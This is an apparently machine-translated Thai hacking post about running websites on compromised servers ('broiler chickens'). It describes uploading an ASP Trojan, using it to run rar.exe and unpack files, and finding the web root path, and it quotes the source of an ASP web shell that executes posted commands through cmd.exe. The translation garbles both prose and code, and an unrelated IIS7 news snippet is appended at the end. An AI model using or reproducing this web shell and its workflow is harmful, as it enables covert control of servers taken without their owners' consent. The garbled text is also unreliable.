แนะนำ: วิธีให้ ASP ของคุณทำงานบนแพลตฟอร์มที่ไม่ใช่ Windows เนื่องจาก Microsoft เปิดตัวเทคโนโลยี ASP ASP จึงถูกนำมาใช้อย่างกว้างขวางในเว็บไซต์อินเทอร์เน็ต/อินทราเน็ต/เอ็กซ์ทราเน็ตมากขึ้นเรื่อย ๆ โดยเฉพาะการดำเนินการฐานข้อมูลเนื่องจากฟังก์ชั่นที่ทรงพลังในการสร้างไซต์แบบโต้ตอบแบบไดนามิกและความเรียบง่ายในการเขียนโค้ด
ฉันคิดว่าทุกคนมีไก่เนื้อบางคนที่มีพอร์ต 80 ถ้าเป็นในประเทศอย่ามองลงไปเพื่อความปลอดภัย หากคุณไม่ต้องการดูถูกคุณอาจมองลงไป ฉันน่าเกลียดมากที่พยายามดึงดูดความสนใจ
สิ่งที่ลำบากที่สุดเกี่ยวกับการวางเว็บไซต์บนไก่เนื้อคือการอัปเดตและอัปโหลดไฟล์จำนวนมาก บริการเทอร์มินัลสามารถค้นพบได้ง่ายในช่วงกลางวันและคุณไม่สบายใจเมื่อคุณเปิด FTP ฉันเดินไปรอบ ๆ อินเทอร์เน็ตและพบว่ามันสามารถทำได้อย่างง่ายดายโดยการรวมการอัปโหลดที่ปราศจากส่วนประกอบและโทรจัน ASP
ทุกคนคุ้นเคยกับ Trojan ASP ไม่มีอะไรมากไปกว่า CMD ฟังก์ชั่นคืออะไร? ไม่ต้องกังวลฟังฉันช้าๆ แนวคิดโดยรวมคือการอัปโหลดโปรแกรม ASP ที่ไม่มีส่วนประกอบผ่าน FTP, 139 หรือ Winshell ฉันเลือก WebEdit (ที่จริงแล้วนี่ไม่ใช่เครื่องมืออัปโหลดที่ปราศจากองค์ประกอบง่าย ๆ อีกต่อไปคุณสามารถแก้ไขลบไฟล์/ไดเรกทอรีและใช้พวกเขาเพื่ออัปเดตหน้าฉันมีโฆษณาฉันไม่มีญาติกับเขา จำไว้ว่าคุณต้องใช้เว็บไดเรกทอรีของไก่เนื้อ ในความเป็นจริงปัญหาส่วนใหญ่สามารถแก้ไขได้ แต่ถ้ามีไฟล์จำนวนมากอัปโหลดทีละไฟล์มันจะลำบาก ฉันควรทำอย่างไร? ตอนนี้ใช้ Trojan ASP ค้นหา rar.exe (ไดเรกทอรีทั้งหมดที่ติดตั้งด้วย WinRAR อาจติดตั้งบนเนื้อไก่เนื้อบางทีมันอาจติดตั้งแล้วหากเป็นเครื่องมือการบีบอัดบรรทัดคำสั่งอื่นมันก็โอเค) คัดลอกไปที่ %SystemRoot %/System32/ อัปโหลดไฟล์. zip หรือ. rar ไปยังเว็บไดเรกทอรีของไก่เนื้อ เปิด Horse Trojan (เรียกว่า Trojan.asp) ชั่วคราวในแถบที่อยู่เบราว์เซอร์ให้ป้อน RAR -X Source.RAR PATH ในกล่องข้อความเพื่อคลายความสำเร็จ V และช้าๆวิธีรับเส้นทางสัมบูรณ์ (เส้นทาง) ของเว็บไดเรกทอรี? ฉันใช้วิธีการในท้องถิ่นเพื่อแก้ไขโทรจันและเพิ่มบรรทัดเพื่อแปลงไดเรกทอรีเสมือนเป็นพา ธ สัมบูรณ์และส่งออกคำสั่ง < % = เซิร์ฟเวอร์. mappath (.) %> คุณสามารถเปลี่ยนเป็นไดเรกทอรีเสมือนจริงใด ๆ ได้ตามต้องการ
มันเป็นเพียงความคิด หากชายผู้ยิ่งใหญ่สามารถเขียนการบีบอัด ASP ได้มันจะดีกว่า แต่? ใครสามารถทำได้? ฉันไม่รู้ใช่ไหม สำหรับวิธีการซ่อนไดเรกทอรีเสมือนและสนับสนุนการแสดงผลภาษาจีนที่ง่ายขึ้นไม่ใช่การอภิปรายในบทความนี้ คำพูดเก่า ๆ ไปความปลอดภัยก่อนมักจะใส่ฟอรัมเล็ก ๆ หรือห้องสนทนา หากคุณใส่หน้าแรกส่วนตัวและทิ้งที่อยู่ติดต่อและหมายเลขโทรศัพท์ของคุณไว้กับผู้อื่นมันจะไม่ดี Ps.Junesun แนะนำให้ทำการแสดงออกด้วยตนเองโดยตรงฉันไม่รู้ว่ากล่องโต้ตอบจะปรากฏขึ้นหรือไม่
| ต่อไปนี้เป็นเนื้อหาที่ยกมา: < %@ language = vbscript %> % Dim Oscript dim oscriptnet หรี่ สลัว szcmd, sztempfile เมื่อเกิดข้อผิดพลาดต่อไป ' - สร้างวัตถุ COM ที่เราจะใช้ -' ตั้งค่า oscript = server.createObject (wscript.shell) ตั้งค่า oscriptNet = server.createObject (wscript.network) SET OFILESYS = Server.CreateObject (Scripting.FilesYstemObject) < ' - ตรวจสอบคำสั่งที่เราโพสต์ -' szcmd = request.form (.cmd) ถ้า (szcmd <>) แล้ว < ' - ใช้ท่อของคนจน ... ไฟล์อุณหภูมิ -' SZTEMPFILE = C:/ & OFILESYS.GETTEMPNAME () เรียก oscript.run (cmd.exe /c & szcmd &> & sztempfile, 0, true) Set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0) < สิ้นสุดถ้า < % <html> <ร่างกาย> <การกระทำแบบฟอร์ม = < %= request.ServerVariables (URL) %> วิธีการ = โพสต์> <ประเภทอินพุต = ชื่อข้อความ = .cmd size = 45 value = < %= szcmd %>> <ประเภทอินพุต = ส่งค่า = เรียกใช้> </ฟอร์ม> <pre> < % ถ้า (isObject (OFILE)) จากนั้น ' - อ่านเอาต์พุตจากคำสั่งของเราและลบไฟล์ TEMP -' เมื่อเกิดข้อผิดพลาดต่อไป Response.write Server.htmlencode (OFILE.Readall) OFILE.close Call ofilesys.deleteFile (SzTempFile, True) สิ้นสุดถ้า % </ร่างกาย> </html> |
แบ่งปัน: เป้าหมาย Apache IIS7 และเปิดแขนของคุณไปยังโอเพนซอร์ส Microsoft ได้ใช้ประโยชน์จากข้อดีของโมดูลที่สูงของ Apache Eric Deily ผู้จัดการโครงการอาวุโสของทีม IIS ของ Microsoft กล่าวว่าพวกเขากำลังทำงานเพื่อเลียนแบบคุณสมบัตินี้ใน IIS 7.0 การเปลี่ยนแปลงที่ใหญ่ที่สุดใน IIS7.0 เมื่อเทียบกับเวอร์ชันก่อนหน้าคือมันรองรับช่องเปิดโอเพ่นซอร์สหลายแห่งผ่าน FastCGI